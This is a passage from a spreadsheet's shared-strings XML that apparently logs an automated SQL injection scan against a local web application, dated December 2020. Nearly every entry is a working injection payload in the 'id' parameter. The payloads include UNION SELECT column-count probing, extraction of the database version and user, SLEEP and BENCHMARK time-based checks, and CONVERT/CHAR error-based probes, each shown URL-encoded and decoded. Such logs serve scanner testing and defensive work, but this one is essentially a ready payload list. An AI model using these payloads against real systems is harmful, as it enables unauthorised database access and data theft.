  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23</t>
  </si>
  <si>
    <t>[ UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER()--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT USER()-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20SLEEP(5)--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT SLEEP(5)-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20USER(),SLEEP(5)--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT USER(),SLEEP(5)-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:04 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:05 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:06 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL--%20</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT NULL-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:07 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))-- ]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:08 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 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</si>
  <si>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http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 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</si>
  <si>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http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--%20</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- ]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%23</t>
  </si>
  <si>
    <t>[ UNION ALL SELECT NULL#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:09 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#]</t>
  </si>
  <si>
    <t>Tue Dec 08 22:18:10 ICT 2020</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))%23</t>
  </si>
  <si>
    <t>[ AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#]</t>
  </si>
  <si>
    <t>http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))%23</t>
  </si>
  <si>
